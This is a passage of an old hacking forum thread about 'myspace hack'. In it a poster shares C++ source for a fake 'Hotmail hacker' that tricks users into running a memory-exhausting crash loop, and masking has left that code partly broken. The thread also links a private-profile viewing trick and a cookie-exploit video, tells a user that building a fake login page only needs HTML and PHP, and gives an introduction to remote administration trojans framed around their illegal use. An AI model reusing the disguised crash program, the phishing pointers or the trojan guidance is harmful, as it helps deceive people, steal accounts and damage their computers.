file access auditing
Closed Thread
Page 3 of 13 FirstFirst 12345 ... LastLast

Thread: myspace hack

Quote Originally Posted by mitch04
    hey mike was that true what u said if u give this person a link there pc will crash in a min? if thats true could u please please please tell me how?
    that would be great thanks
    I do not know what you are talking about. This forum has a 'quote' button for a reason.

Quote Originally Posted by mike*0*
    Lol, if he uses msn, give him my email, and I can send him my memory leak program that crashes the computer in * minute by using up ALL the ram.
    there how would u do that?

Quote Originally Posted by mitch04
    there how would u do that?
    I made a program in c++ that keeps requesting new memory on the heap until the computer runs out of ram, and presumably crashes.

How would you do that? You would learn a programming language, there are thousands of ways to crash a computer.

Can I get the source?

Quote Originally Posted by han_han
    Can I get the source?
    The original version was a 'trick' program which told users to enter an email they want to hack, hit enter, then it will be hacked. Instead of hacking emails, the program created a memory leak, as said above. That program was written for the idiots on this forum who keep b***ing me about hacking email accounts. Here's the original source:

Code:
    #include <iostream>
    #include <cstdlib>

using namespace std;

int main() 
    {
        char email[64];
        cout << "############################ Hotmail hacker v*.5 ############################\n\n";
        cout << "Please enter the email address (has to be @hotmail.com) you want to hack, then wait * to 2 minutes while it gets and decrypts the password\n";
        cout << "\n\nEmail:  ";
        cin>>email;
        cout << "Currently hacking:\t" << email << "\n";
        cout << "Password received from hotmail servers, ready to decrypt the password\n";
        cout << "Decrypting password - This can take up to 5 minutes...\n";
        while (*) 
        {

int * memleak = new int;
        *memleak = *0;
        }

return 0;

}
    If you just want the plain computer-crashing code, here (it's pretty simple):

Code:
    #include <iostream>
    #include <cstdlib>

using namespace std;

int main() 
    {

while (*) 
        {

int * memleak = new int;
        *memleak = *0;
        }

return 0;

}
    Both of these programs WILL crash/heavily lag your computer if you run them for any length of time, so make sure you have task manager open on the process tab ready to kill the process when necessary.

Oh, and because this is a myspace thread, I figured people would be interested in this page I found through digg, which describes how to view private myspace profiles/pictures:

[url]http://grownupgeek.com/view-private-comments[/url]

tried that

I tried that but when i entered the persons friend id instead of showing their comments it showed mine???

What am i doing wrong?

I found this video about myspace hacking. I dont really understand it though.
    [url]http://rapidshare.de/files/*86204*7/Myspacecookie_exploit.q.rar.html[/url]

Quote Originally Posted by littledoll
    I tried that but when i entered the persons friend id instead of showing their comments it showed mine???

What am i doing wrong?
    The vulnerability was fixed.

So do you send the source code up there to an email address?

Quote Originally Posted by H4x0r*d
    So do you send the source code up there to an email address?
    No. Learn what C++ is, learn what a compiler is, learn what source code is, and you will have your answer.

Help

Mike and others ive been tring to get a meyspace replica page the whole month of aug.PLEASE PLEASE Help me....

This is what I got so far.......

error24*5*4564*6*4.freehostia.com

And I dont no how to apply it

Quote Originally Posted by RoscoeMan
    Mike and others ive been tring to get a meyspace replica page the whole month of aug.PLEASE PLEASE Help me....

This is what I got so far.......

error24*5*4564*6*4.freehostia.com

And I dont no how to apply it
    Making a fake login page is no different from making any other web page that utilises forms and server-side scripts. Learn html and php, and it will be obvious which steps you have to take.

Smile

Quote Originally Posted by mike*0*
    What really annoys me is when people say "HACK THIS ACCOUNT ___", expecting hackers to just hack it. Why would I do something illegal for a random forum member? They will probably be gone when they get what they want, all I will be doing is something illegal that they will forget about in 2 weeks. I have no problem helping people new to hacking, as long as they are smart enough and actually want to learn themself, I answer any questions they have. But people just ask me to waste my time when they could have [URL="http://www.google.com"]googled faster[/URL]. So I don't think my flame was unnecessary. If I gave full instructions and tutorials to everyone who asked me, I would not have any time left. And like I said, I will answer any questions about hacking, or html, like you asked. But no full tutorials, there are many good sites like [url]www.w*schools.com[/url]. If you find it hard, just keep reading it, me explaining isn't going to make you understand any more.
    Hey Mike*0*,
    i saw the whole thing about how it is very frustrating to have these people on here that are Newbies and stuff but like at one point in everyones life werent the a n00b? Well anyways You seem like a ice guy and if you dont mind i hope you can give me some pointers in backdooring. I have some prior experiance but i am still very ignorant of it for the most part. I am willing to learn. Trust me I have a good bit of time on my hands. And you know how to say to google it? I came accross this site by google. So i am hope for some pointers on this
    Thank You
    -Reeda

Quote Originally Posted by Reeda
    Hey Mike*0*,
    i saw the whole thing about how it is very frustrating to have these people on here that are Newbies and stuff but like at one point in everyones life werent the a n00b?
    Everybody was new at one point. But the difference between me and them is, I didn't go running to a forum to ask a more knowledgable guy at every point I was stuck or needed help.

I don't have a problem with people being new, what irritates me is when they ask basic questions which they blatantly haven't done the slightest amount of research to answering. Not me or anyone else here is a free research service for people too lazy to do some work themselves.

Well anyways You seem like a ice guy and if you dont mind i hope you can give me some pointers in backdooring. I have some prior experiance but i am still very ignorant of it for the most part. I am willing to learn. Trust me I have a good bit of time on my hands. And you know how to say to google it? I came accross this site by google. So i am hope for some pointers on this
    Thank You
    -Reeda
    By backdooring I assume you mean the use of common trojans such as Netbus, BO2K, Subseven, Prorat, etc.? I really don't see where the problem lies in using them. They contain a manual and are designed to be simple... Unless you are talking about making your own 'backdoor'. Anyway, I will write a brief introduction to this topic below:

==================================================================================================== ======

The term 'backdoor' is a general way of describing a method of gaining access to a system while remaining hidden. Backdoors usually are in the form of remote administration tools (RATs) installed on the target computer.

Remote administration tools are programs which give an attacker access to the system they are installed on. They can be both legally and illegally used - some people might use them to control their own computer while away, while others might send them to people disguised as other programs (in this context the program is a trojan) with the intent of illegally accessing and controlling their computer. We will be discussing the illegal use of them. Malicious software, incidentally, is called malware.

RATs operate on a client-server system. The program is installed on the target computer and operates as a server, then the attacker connects in as a client. Also there is another system of doing things called reverse-connection. In this scenario, the attacker runs a server portion of the tool on his computer then when the RAT is installed on the target's computer, it connects back to him/her as a client. This method is used to bypass firewall and router restrictions at the target's end since on most home connections it isn't possible to make incoming connections to them.

Once the RAT is installed on the target machine, the attacker usually will have a notification system for receiving the target's IP address, something vital to making a connection to them. The tool can be designed to send this info via email, IRC, instant message, or a whole lot of other methods.

The most common RATs are Netbus, BO2K, Subseven, Prorat, and a few others. The use of these freely downloadable tools is widely looked down upon in the hacking community due to the fact that they are usually operated by people with no knowledge or desire to learn about computers, who just want some cheap thrill of deleting someone's files or similar. These people are called script kiddies. It's slightly more acceptable to use such malware for illegal means if you create it yourself, since you actually have an interest in the workings of the programs (even if that interest is misguided in many people's opinions).

As for features, remote administration tools have been growing ever since they were first used. Commonly you can expect these features:
    • Screen grab.
    • Mouse clicking.
    • Keylogger.
    • Webcam capture.
    • File download/upload.
    • FIle execution.
    • Messages to screen.
    • Stored password decryption.
    • Remote shell.
    • Registry modification.
    • Open/close disc drive.
    • View and kill processes.
    • Change homepage.
    • Flip screen.
    • Print documents.
    • Play audio.

One thing to note is that screen or webcam capture is of very bad quality, as it remote mouse control. Home connections simply don't have the bandwidth to stream > *024x768 desktops over the internet, so it's 5 secondly screen-grabs at best.

Remote administration tools can be used for any purpose, by anyone. Pranks, ****** card fraud, spying, etc. Note that it is very dangerous to remotely view someone's webcam (a pedophile was caught doing this using subseven I believe), not to mention a massive invasion of someone's privacy. I do not condone it. Remember it is illegal to gain access to a system unauthorized.

==================================================================================================== ======

If you want to ask me a specific question you can, otherwise check out the three pages below for information. Remember, wikipedia and google can answer questions quickly and in detail:

[url]http://en.wikipedia.org/wiki/Backdoor[/url]
    [url]http://en.wikipedia.org/wiki/Trojan_horse_%28computing%2*[/url]
    [url]http://en.wikipedia.org/wiki/Remote_administration_tool[/url]

But I will say what I always say to people who ask me for 'tutoring' - if you are not self-sufficient enough to learn by yourself, you will never get anywhere. I didn't learn by leeching information off other people. One day there will not be someone available to give you a personal explanation of everything.
    Last edited by Ezekiel; 09-17-2006 at 02:10 PM.

Closed Thread